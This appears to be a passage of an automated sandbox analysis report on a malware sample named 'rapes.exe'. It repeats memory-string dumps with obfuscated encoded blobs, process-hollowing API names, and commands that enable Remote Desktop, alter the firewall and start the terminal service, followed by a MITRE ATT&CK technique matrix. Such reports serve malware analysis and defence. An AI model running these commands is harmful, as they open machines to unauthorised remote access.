RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000009.00000003.1303062530.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000009.00000003.1303062530.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000A.00000002.1357003486.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000A.00000002.1357003486.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000A.00000003.1316415954.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000A.00000003.1316415954.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000F.00000003.1656544748.0000000005310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000F.00000003.1656544748.0000000005310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	141 Windows Management Instrumentation	11 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Clipboard Data	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	51 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	212 Process Injection	431 Software Packing	NTDS	359 System Information Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	991 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	233 Masquerading	DCSync	481 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	481 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

